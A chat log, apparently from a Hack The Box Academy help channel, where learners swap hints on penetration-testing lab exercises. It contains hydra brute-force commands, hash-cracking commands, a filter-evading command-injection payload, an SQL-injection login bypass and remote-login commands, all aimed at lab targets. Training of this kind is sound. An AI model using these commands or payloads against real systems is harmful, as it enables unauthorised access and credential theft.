Quick question, I'm having trouble with the RDP section of the Password attacks module, whenever I run hydra against the target for RDP with the provided resources, the scan takes longer than the box time limit. I know there's a restore file, however the IP always changes when you restart the box. Is this a connection issue, or am I missing something? fyi, this happens on both my host and the provided attack machine
bless previous people going through the password mutations i was able to brute the ssh super quick with it

Always try ftp and hope for pw reuse its 4-6 times faster than ssh and you can do both simultaneously
this part of the module required bruting ssh
Right but often ftp is enabled and able to be cracked and in a couple the pw was the same for ssh as it was ftp
Just a tip do with it what you will
Please anyone know why i can't upload shell to nibbles on the academy section after obtaining "admin" + "nibbles" ?
What's the exact module section and question? @tranquil carbon
the academy section that goes through the nibble box is fairly straightforward on how to do so
if you could provide more information as to what errors you are receiving
Yaaaas we need m0ar data friend @tranquil carbon
because often times the reason why it's not working may be in the error
but with just the "it's not working" error... not sure what to tell you friend
Getting started..
this question yeah?
@fathom pendant Yes, that one exactly
i mean
the module tells you how to bruteforce it with hydra...
you will need to use the provided user/password list
Getting started has like 23 sections
however i "cheated" to get my user list to shorten my time :) (Check C:\Users )
it's the nibbles box portion where they walk you through the box
is what it sounds like
Yes it's pretty straightforward but the problem begins with the privilege escalation of nibbles, gotten access to the dashboard but uploading the shell to the site just doesn't happen, it just loads and times out
are you in as nibble?
Nibbles - Initial Foothold
Right, that's what I have been doing. I got the other questions, but for some reason when I try using hydra against rdp it never finds the correct user/pass. I'll give it another go though
remember you have MULTIPLE ports you can listen to on your system
As admin with pass nibble
did you upload the image it walked you through to do ;)
like
honestly it literally walks you through how to upload your foothold shell and everything
remember it's asking you to do a reverse shell not a web shell; so when you UPLOAD you'll need to LISTEN for your shell as well
Not really sure where to ask this question on here: can anyone explain why the RID 500 Admin on the DC can copy the system.hive but SYSTEM on the DC can NOT? That seems really off to me.
¯\_(ツ)_/¯
good question
@rustic sage yea im scratching my head really hard right now
that sounds more like a google question - could also be that misconfigurations happened
Hmm
take a look at the payload you are delivering in the <?php> script
this is probably one of those cases of you're just blindly following without actually taking notes
because this is by far one of the most hand holdy type labs you'll come across; so I definitely suggest paying attention and regoing over some of the module and taking notes
as they will probably come in handy later
Sure thanks man
Use NSE and its scripts to find the flag that one of the services contain and submit it as the answer. I am having a hard time finding the flag after performing multiple scans. I have tried vulnerability scan, but any input turns out as wrong.
what's the module and section?
@silver sigil sent you a dm
you may not need to do --script vuln; as that was just an example if you were scanning for vulnerabilities on it
For the Passwd, Shadow & Opasswd section on PASSWORD ATTACKS, I unshadowed the .bak files. Created a mutated password list from the custom.rule and password.list file from provided Password-Attacks files.
Ran hashcat with -m 1800 against the unshadowed file and mutated password list. That was unable to crack it. May I have a hint/get some help?
Can Anyone teach me on how to manage, change PW and user name on kali Linux pls?
@ripe ingot passwd
Ye
just type that and it will change it for current user
usermod -l login-name old-name
I got some help. I was looking in the right place. Couldn't figure out how to open it
can anyone nudge me on Pivoting Tunneling and Port Forwarding - Skills Assessment? got ||an RDP session on 172.16.5.35 and trying to figure out how to pivot to 172.16.6.25||
Update: the pwnbox helped, downloaded the file quickly (the second time), got the file to my VM via ufile, || cracked it with john|| now just trying to mount and see what goodies are inside. Ty for the help
@fathom pendant Thanks, your hint on users definitely helped speed things along
anybody have a sec for a question? In the Shells and payloads Skills assessment. On the last question
what's your question?
It's an eternal blue exploit, the machine hangs after it successfully overwrites the buffer
I get fail every time
Wondering if there's another way to exploit. I'm about to upload a shell to the webpage and see if that works instead. The hint says it's an eternal blue exploit so idk why it's hanging up. others have said the same on forums but never gave the fix
i don't remember using eternalblue, let me check again
ok so i did use eternalblue
And it worked?
yeah it works, what's the output you're getting when you run the exploit?
Let me run it again so i can copy and paste it
Need discord nitro so i gotta break it up
It literally wont let me send it wtf
I dmed it
wouldnt let me put it in the chat without having discord nitreo
nitro*
I feel like i've exhausted every default cred for the mysql part of the password attack module
yea I've discovered what type of dns server is running tho, but i can't seem to find the version number
tomorrow, it begins.
||NLnet Labs NSD||
one cred to rule them all
that really doesn't help :^)
i've tried ALL of them or at least I believe I have unless I'm just missing something from the cheatsheet
figured it out :^)
i wasn't using the list
i was using the "improved" list from the sources
:^)
got a link?
O
skill tissue for your skill issue
anyone can give me a nudge on network enumeration with nmap, bypassing firewall section medium lab?
i need help plz... i posted this in the wrong spot accidentally, so here is the link to it: #web message
It was MD5, just had to add the -g 1000 argument and it worked.
what is the exact issue you are facing; if you believe you have the answer or are doing the right thing; have you tried disconnecting/reconnecting to vpn, resetting target, changing vpn region
i've got it
its so weird
my own vm gives diff results compared to when i use the web browser instance
sometimes that happens
like I said; refresh your vpn by disconnecting and reconnecting
is there any reason its like that?
and then boom you get it there too
sometimes it just do be the way that it is
ic sadge
technology is always reliably unreliable :D
:/
i forgot if i did double check this or not but in my note it's ||ntlm|| hash
Hi, I need help with Pivoting, Tunneling, and Port Forwarding(Web Server Pivoting with Rpivot) . I'm doing everything right but I can't browse to the target server.
Hi, are there any Modules in the Academy that consider container attacks (like Docker)?
Good luck
Hi All, Gm, Kindly assist me on Tier 0 - File Transfers module > their first question - ("Download the file flag.txt from the web root using wget from the Pwnbox. Submit the contents of the file as your answer") >>> how can we get flag.txt (3 points cubes) >>>> i tried accessing on web (both http & https) - ACCESS FORBIDDEN (error 403) & second question, i fetched out the hash by taking RDP (as per mentioned steps in question 2) > SO JUST NEED A BIT OF ASSISTANCE AS the next sub section - linux file transfer has the same 1st question) so is it >>> do i need to do directory busting, SQLi (OTHER WAYS TO ENUMERATE like we do in OTHER HTB post nmap scans) OR IS IT ONLY ASKING WGET METHOD TO GET FLAG AS PER QUESTION STATING >>> so bit confused here >>> assistance needed...thanks
so guys need some help. feel really stupid currently on CPTS/Footprinting/IPMI/Password in clear text q.
I'm able to extract the hash, but when using John I get no match when trying with the rockyou word list.
Am I using the wrong syntax: john --wordlists=<path to rockyou> hash.txt
the hash itself I copied everything after admin: into a txt file
--wordlist and not plural
nope
depends if you are using hashcat for example you can specify the username to be included with --username
trying with John
experiment
it will only cost you like 5 seconds to remove the username, so go for it
give it a go with hashcat
Hi, you can configure FoxyProxy to do that. For example, since I use Chisel (which you might see in a section further in that Module), it sets port 1080 with Socks5. So I do the following:
got it to work with hashcat. Thanks!
Anyone happen to have a nudge/hint?
is this right
thanks alllottt .....maybe i was focusing on an HTB-boxes-like mindset - doing nmap port scans (enum stuff and then googling their version exploits & all other ways - dirb, gobuster, burp etc...(even for tier 0 stuff) BUT I WAS A BIT SURPRISED WHY THE HELL IT WOULD BE FREAKY HARD BEING IN TIER 0 ...sometimes i was thinking..this way....NEVER THOUGHT IN BASIC GROUND LEVEL STUFF (HA HA HA) >>> maybe all mixing in tier 0 will maybe indeed be required in tier1 & tier 2...lol anyways thanks a lot, much appreciated >>> got it in one shot (flag.txt 100%[===================>] 32 --.-KB/s in 0s)
For the Passwd, Shadow & Opasswd section on PASSWORD ATTACKS, I unshadowed the .bak files. Created a mutated password list from the custom.rule and password.list file from provided Password-Attacks files.
Ran hashcat with -m 1800 against the unshadowed file and mutated password list. That was unable to crack it. May I have a hint/get some help?
@magic valve use rockyou.txt
the reason i ask is, if it is, there is something seriously wrong on my end. Because this would be the 3rd question that has not let me answer in the last week
if the answer is not accepted then it is the wrong answer
I attempted..showed will take estimated 4 hours. Pretty sure I let it run for about 10-minutes. Only able to have box connected via VPN for 90 minutes. Assuming it should be cracked before that time?
not the case before, even the staff have said the answers i have given were right soooo. lol i just don't want to waste my time if i do have the right answer but there is something wrong with the page
and everything i look up and research says what i have is the right answer, how else would i start an http server with npm and start it on port 8080
it is partly correct
ugh i've hit the kira wall
what's that
Yosh!! gl
Just did this one yesterday. This worked for me in the first 5min I think
any tip to nudge me forward on the Password Attacks; Hunting Linux Creds section because SMB is getting me nowhere as it just keeps throwing me up a fake password :C
firefox?
Before or after kira?
do you have the password?
Yeah I went through everything in there with the hint, only way I could think of to get a foothold was brute forcing the ssh with the first 25k mutated passwords
was it 25k at the end?
no :/
the exercise (question) gives you a password, have you mutated it?
The hint gives you one. I believe all of them can be solved without the hint
doable, however, you are saving quite the time to brute-force it
For this one, from what I used and checking the mutated list, yes I had to use 25k otherwise it would miss the password
Fair enough
Just wanted to clarify the rockyou.txt worked in about 5 minutes to crack correct?
with the hint; i was able to brute the ftp service in a split second :D
hello, I have an mv command question in bash
I'm trying to do some command injection. I have a website that calls the mv function like so : mv /bla/bla/bla.txt /some/dir/
and i would like to append a command after that, like so : mv /bla/bla/bla.txt /some/dir/ ; somecommand
except when i try to do that, apparently the mv command picks ;somecommand as the directory it tries to move the file to
So is there a way to do what I'm trying to do but better?
No no, the password.list in the resources, mutated with the custom.rules also from the resources
Interesting. Is it okay if I dm'd you to confirm I am using the correct command?
Yeah all good
But this one I literally just followed the steps in the module
Oh I think I know what the issue is! Which user do you want to crack? And are you filtering for that one?
root. Technically not filtering just root. Will message u with screenshots soon
ok im pretty sure i have the right name here or am i out to lunch
Check if you have any spaces before or after if you copied the name from terminal
All I remember in that module is that in "Resources" you got a password list and in the "Mutated password" they show you how to, well, mutate it. And that new "mutated" list works for many of the passwords into the Module if rockyou fails. I don't remember if I needed more dictionaries
can someone sanity check me because apparently now I can't hydra or CME this lab
it's just sitting at 1 max thread
edit
sanity check not needed I'm just tired
Tried that and didn't help. No worries either way.
can anybody help with the command injection skill assessment?
oh yeah I JUST did the one you're talking about :)
make sure you ONLY ask hashcat to do the root user and not ALL the users; and the mutated password from their custom rules is indeed in the list :)
Hi I am on the cracking into hack the box path and when I unlocked the last module I pressed it twice so it deducted 20 cubes instead of 10 who do I need to speak to get the rebate for the cubes
Support on the site
Green bubble
If you don't see the chat option select an article, then at bottom of article click sad face
anyone?
Ask your question, someone may be able to answer
well if anyone has any idea why this payload doesn't work I'll take the advice: &&{c'p',${PATH:0:1}flag.txt,${PATH:0:1}var${PATH:0:1}www${PATH:0:1}html${PATH:0:1}files}
I don't get an error, but the command seems to execute into nothing
i've tried just having ls as the command but I don't get any output either
ahh okay i think you're trying command injection on a wrong parameter for that module judging by your use of cp
no i know the injection uses mv initially
i tried cat too but it didn't work
but i just figure cp into the directory i can read through the web app would be the most efficient way of seeing the flag
hmm cat is what i used but there's a few different pages to filter through on that assessment for finding the one with correct command injection, dm me if you want
I want to know what's the entry level certification for cybersecurity
Hello All. I am working on Information Gathering - Web Edition Virtual host section. I am stuck and cannot get any of the answers in the assessment. I am running the following command.
ffuf -w /usr/share/seclists/Discovery/DNS/namelist.txt -u http://10.129.221.42/ -H "HOST: FUZZ.inlanefreight.com" -fs 10918
I have also added inlanefreight 10.x.x.x to my /etc/hosts and I am not getting any of the answers.
Need to add :FUZZ at end of wordlist I think
Like this...? ffuf -w /usr/share/seclists/Discovery/DNS/namelist.txt:FUZZ -u http://10.129.221.42/ -H "HOST: FUZZ.inlanefreight.com" -fs 10918
doesn't seem to be working
Hi all, currently doing footprinting module, easy assessment.
Do you guys bruteforce the password after finding the user, or manage to crack the hash ?
-fs is a switch for filtering out specific response sizes from the output. try running the command without the switch, check your output, and add the switch with the response size to filter
also use the smallest top subdomains wordlist from seclists
Thanks for the reply! That's what I was doing with the -fs switch. The response size for junk was coming out to be 10918. If I don't add that switch the amount of payloads becomes quite overwhelming to search through
how to verify
Am I following the right steps?
-
spawn target from academy, add IP and inlanefreight to my /etc/hosts
-
run ffuf command and look for Vhosts
Active Directory - Domain Trust Primer
I found all of the flags, but curious if anyone else had issues running the other commands or if I did something wrong?
yeah that's right. change the URL in your command to the domain
nah actually the domain is inlanefreight.htb and not inlanefreight.com
Omg
Can't believe I missed that.
Thank you

so guys, in the Footprinting Module\SMTP. Am I missing something here? How are you supposed to know that you need to use smtp-user-enum to solve the question? Am I missing something obvious in the content?
play with the timeout timings
yeah, my questions are more on how should you come to the conclusion to use that script. when it hasn't been mentioned at all in the content of the module
ahhh my bad
i realise after doing academy in HTB, they don't spoon-feed u so much. some things u have to search on ur own.
of course u can do it 1 by 1 using telnet like the example, but sometimes u just have to search for automated tools to assist u
its frustrating i know. but that's how htb academy wants us to do it i believe
depends actually, some people will rely on the material they have in hand and do assignment, so their brain wouldnt want to look outside the material when doing it.
what module ?
i feel like there are too many switches in play there
i don't think u need -sA and -n
sorry is this on the footprinting module?
looks like it but i dont know what page he is
i'm taking a break from hard footprinting
oh lol im just about to start that one. i would try a dns* script
what module is this ?
oh wait. sorry i did do that one. this is on the medium lab right?
i think he's trying to get the bind.version
which is an enum script
BUT which vpn are you using? tcp or udp?
oh well then you don't have to worry about that issue. let me see if i can remember what i did and I'll DM you a hint. i know UDP is key
@turbid lily Thanks for the help.
ok i was correct. lemme dm you the hint
@acoustic owl can i DM you?
i'm working on the bash scripting fundamentals and under the conditional execution i don't think i understand the question. i had added to the for loop code that should effectively do this: if $counter eq 35 then echo ${#var} which i think should output the number of characters in the variable var as it wants but the number i get back is not correct.. what did i misunderstand?
hi was anyone able to crack the password for ipmi in footprinting module i am stuck here. i used the command "hashcat --username -m 7300 out.hashcat -a 3 ?1?1?1?1?1?1?1?1 -1 ?d?u"
try using a wordlist.
ugh it was off by one because it is expecting me to count the CR of the echo and i counted it internally to the program. bad wording....
what module: Password-attack
which part: Password Attacks Lab - Hard
Question: I have found the hash for an account, I am trying to do a pth or invoke the hash but somehow it won't let me in. can someone check if I am using the right tool/cmdline?
The pass the hash and pass the ticket sections of the module were added recently and are not used in the final labs.
check
What module is this again? I might be able to assist you. I don't know if I took notes on the assessments but I might be able to give you a push in the right direction.
Yeah it is definitely a mind set thing, it's an interesting journey
the problem was that because of using samr2 to dump i did not get the right output, after using impacket I got the right hash, which worked with a pth attack, however I only checked after cracking the hash. Thx for the nudge though, made me find out my hash was faulty
Sure, but I'm on my way right now. Write back later
wdym i am talking english ?
Has anyone finished the HTTPs/TLS Attacks skills assessment? I need some help finding the vulnerability.
anyone that has done Attacking Common Services - Easy, please DM. I'm at my end trying to figure out what to do with the username i found. I have looked through discord and the forum and it seems like i'm the only one having such trouble with this part....
@steep loom connect to mssql
got it thank you, problem was wordlist
@wispy pulsar Can i DM you?
of course!
anyone experiencing connection issues to labs? I can load the pages and then for minutes nothing loads.... this is via the vpn connection
this is not the place
Can we please make sure we keep on topic (HTB modules related).
Kinda hard when someone comes in here every few hours and asks us to hack their ex's instagram or something like that
The timezone is rough. Just let us know either via DM or ping and we can handle it from there
Will do
Need some help on module Active Directory Enumeration & Attacks
section - Attacking Domain Trusts - Cross-Forest Trust Abuse - from Linux
question - Log in to the ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL Domain Controller using the Domain Admin account password submitted for question #2 and submit the contents of the flag.txt file on the Administrator desktop.
if only there was some way channels could be locked down so someone has to verify their account so that people had to read rules and go through some extra steps to reduce spam and direct people to more appropriate channels
If only it were that easy
I've tried
Enter-PSSession -ComputerName ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL -Credential INLANEFREIGHT\administrator
Enter-PSSession -ComputerName ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL -Credential INLANEFREIGHT\sapsso
evil-winrm -i 10.129.199.182 -u sapsso
evil-winrm -i 10.129.199.182 -u administrator
have been unsuccessful in logging in with these from the parrot attack box
You can't pass a username when using Enter-PSSession. You need to create a credential object
how do you create a credential object?
oh wait I think I remember doing that earlier in the module
checking my notes
Wait, why are you using powershell if you're attacking from linux??
Just use psexec @wheat garden
I am currently doing the Brute force Skill assessment - Website.
The question says
Once you access the login page, you are tasked to brute force your way into this page as well. What is the flag hidden inside?
My command is :
hydra -l user -P /usr/share/seclists/Passwords/Leaked-Databases/rockyou-10.txt -f 165.232.98.111 -s 32465 http-post-form "/admin_login.php:user=^USER^&pass=^PASS^:F=<form name='log-in'"
What am I missing, since I feel the only thing i needed to change was the php address, user/pass and fail string ( from the command I received inside
The hint says to use the username found in first part, which is user
but I cannot find the password. If anybody can nudge me in a correct direction that would be swell
So, are you getting an error or sth
No just the password is not found, I am just wondering where am I going wrong, since using rockyou.txt would take too long, but I browsed the HTB forums and people said rockyou-10 should be enough
then, asked them hahaha
my suggestion, if you asked: change and use better one
a list with 10 passwords is obviously coming a bit short
hello, happy to see you happy
just trying different methods to login ok ill try psexec
Thank you yep psexec worked also was using the wrong IP address but got the flag now.
oh man that hard footprinting lab felt like it was going everywhere
about to start that. even medium was above me, i need tips from htb forums.. is it just me or other people using htb forum to get through ?
i feel the sections are right on for notes so i end up just copy/paste them into another thing.. mostly saving helpful commands
Copy/pasting isn't learning
It helps reinforce things if you rewrite sections into your own words
That way you can get a better grasp of concepts
yeah i get that, however its just description of something aka smb ssh etc, but how to use it i do save commands n that,
Even still
Typing them out puts it in muscle memory
Cause you may get into a scenario where you can't copy/paste
Or you need to rewrite the command to bypass filters
If you have to constantly ask for help or refer to the forums one of two things is happening.
1: You're not actually learning the material (evident from your comment about copy pasting)
2: You aren't trying hard enough. Hacking isn't easy and a lot of the time you're going to struggle. That's part of the learning process. You should not be asking for help if you've spent any less than an hour for some of the easier exercises and longer for some of the harder ones imo
i dont think ive articulated it very well sorry, I understand or at least grasp what something is. its more so when i should know something or not.
Elaborate on this, because there's something from the sections that isn't sticking when it comes to the practice
You're never going to know everything. Especially in this field it's impossible to ever know everything. A big part of it is learning how to find the answers on your own
I'm finishing up on the getting started module on the pentest path iam trying to upload a shell on the permalink in the get simple cms. I can't figure out what code to put in there. I don't want the answer but just a nudge.
The section should go over it
Or at least how you're supposed to find the answer
mmm i guess it just seems too obvious after seeing a hint or point in the right direction after that i generally can figure it out.
Again it's just one of those things that you'll end up learning over time; also there will be times where you'll need to use Google to help find the answer
ohh i always googling lol
But you should be able to get the basic info before searching for answers
Step 1: relook at your notes
Step 2: re-evaluate the commands and errors you're receiving
Step 3: adjust accordingly
after scans and couple of specific script scans and see whats there i generally go through past content and testing the commands previously given etc then i often hit a wall if something isn't jumping out. probably just because im new and is not somewhat inbuilt yet?
Rarely will there be a requirement to use stuff from other modules, or at least hardcore necessary - aside from basic enumeration
thank you mrb3n for the ad attacks module i'm having a blast
Currently on Attacking Common Services -Hard and When listing user through task manager || PS it only shows that Fiona is connected...If this is the case how can i find my impersonation targets other than reading the names of the User's folders? I did and basically guessed the 2nd to last question because there are only 3 choices(I was grasping at straws), I have the creds pulled from all of their files w/n the share (thus how i pwned fiona) but now im stuck on the last question @>@
Did you ever get help with this or figure it out? I'm also stuck on this question and it's quite irritating
I have a question, I was doing Skill Assessment - Website in module Login Brute Forcing.
I was stuck on it for quite some time, running the different lists not getting the correct password.
Then I ran the same command same list on pwnbox and got the password in 5 sec.
The command was :
hydra -l user -P /usr/share/seclists/Passwords/Leaked-Databases/rockyou-50.txt -f 138.68.164.196 -s 30501 http-post-form "/admin_login.php?:user=^USER^&pass=^PASS^:F=<form name='log-in'"
( obviously changed it in pwnbox to compensate for the different url )
But my question is, what was I doing wrong in my own virtual machine, so it did not find it.
Where's the support chat icon gone? Need some HTB help about my subscription.
Mine says :
Yes I did proxychains nmap TARGETIP -p TARGETPORT -sC but it doesn't work
¯\_(ツ)_/¯
Hi All, I'm having trouble with the flag on https://academy.hackthebox.com/module/33/section/194 I manage to successfully log in as user 'tom' using an injection on the username but I don't get a flag. I do get gibberish as a string following the message "Login successful as user: tom". Any help would be appreciated, feel free to DM.
Linking the module doesn't really help, it helps more to just say module name and section so that someone that's completed the module can just look up their notes. Also are you sure the "gibberish" isn't the flag? Some flags don't follow the HTB{... format
The part of the module on Subverting Query Logic.
And what has the module taught you so far on how to query for the flag?
Since it's SQLI did you inject an SQL query?
Use an SQLi on the username password to bypass the query logic. This one uses username OR '1'='1 variety.
Yes, I used a simple 'name' or '1'='1' (i.e., a statement that always evaluates to true).
Also what is the question asking?
The response says Login successful as <user>
Specifically
The question says "Try to log in as the user 'tom'. What is the flag value shown after you successfully login?"
So that should be the case, are there rogue spaces?
Sometimes an extra space can make the flag value incorrect
There don't appear to be any spaces in the response but I suppose it could be on either side.
Are you copying the quotes as well?
That seemed to be it, I guess maybe I was grabbing a space on either side when I was copying it.
:)
Thanks! Sometimes it's the little things.
Always check your paste formatting because 9/10 times that'll get ya
Thanks for your help!
This module covers techniques for footprinting the most commonly used services in almost all enterprise and business IT infrastructures. Footprinting is an essential phase of any penetration test or security audit to identify and prevent information disclosure. Using this process, we examine the individual services and attempt to obtain as much ...
Nice content, appreciate the lesson.
But i really feel footprinting medium and footprinting hard should swap place.
I have an issue in
- Module: WINDOWS PRIVILEGE ESCALATION
- Section: Windows User Privileges
- Subsection: SeImpersonate and SeAssignPrimaryToken
Do you know how to solve this issue? Can someone check if the machine is not broken?
same here, have you found the issue?
Use the correct wordlist (hint: you should have created it earlier)
thanks
I just did this module
a strange thing is that i get love ,but when I insert it, it says incorrect
Hii
Because that's not the password :)
no.
#zip2john Docs.zip > zip.hash
ver 2.0 efh 5455 efh 7875 Docs.zip/Documentation.docx PKZIP Encr: 2b chk, TS_chk, cmplen=6522, decmplen=9216, crc=B1855553
┌─[root@parrot]─[/home/user/Downloads]
└──╼ #john --wordlist=password.list zip.hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: Only 1 candidate left, minimum 4 needed for performance.
0g 0:00:00:00 DONE (2023-02-02 13:37) 0g/s 2.564p/s 2.564c/s 2.564C/s l
may I pm?
I'm heading to bed brother but I'd say go over the custom.rule in creating your password
ah, got it, thanks
Should be straight forward from there
I have this issue, termx:~$ mssqlclient.py sql_svc@10.10.10.27 -windows-auth Impacket v0.9.22.dev1+20200513.101403.9a4b3f52 - Copyright 2020 SecureAuth Corporation Password: [*] Encryption required...
it's been a while since i did this one so i don't remember. try running terminal as admin. if that doesn't work then you can find waldo.txt ||on another machine later in the module||
Ok I will check that. Thanks
Someone for a couple of questions about windows privilege escalation module ?
do i need the built in cloud to ssh into target?
cus for some reason i can't do it from windows terminal
For any target that's not a web target you need to be connected to the VPN to access it
As the boxes are on a separate network and not connected to the internet
ahh i see ok
So if you have a vm
Or if you wanna use pwnbox it's more recommended than doing it on your host OS
i would love to but it's a paid subscription and i want to test it out first before i do get one
Virtualbox is free and most pentest distros come with OpenVPN for a VPN connection
no i mean like their own vm they got
Yes
hackthebox vm is free if u got a subscription isnt it?
But you can still access the VPN on your own vm
I'm using parrot OS; the getting started module talks about how to get started. https://www.parrotsec.org/ they have a htb distro but not necessarily required to download. The only major issue you run into is waiting for some tools to download
Depends. It all comes down to preference. I use Kali. Other people like to use Parrot. Some people use Ubuntu and just install the tools they need on their own
^
Some absolute mad lads use windows
i was going to use windows :D
im gonna go with ubuntu
Just note that if you do that you'll have to figure out how to install many of the tools you need on your own
And for many of them, it's not nearly as simple as sudo apt install <toolname>
Also windows defender blocks some of the tools
is there like specific tools needed for htb?
cus if i install ubuntu and like nmap and stuff i get it but
do i need to look for specific stuff to install too
other then vpn
Yes
Some of them do, some don't, as most people don't run the tools on windows, there's not a lot of documentation on windows installation and usage
If you're a beginner I'd highly recommend using Kali or Parrot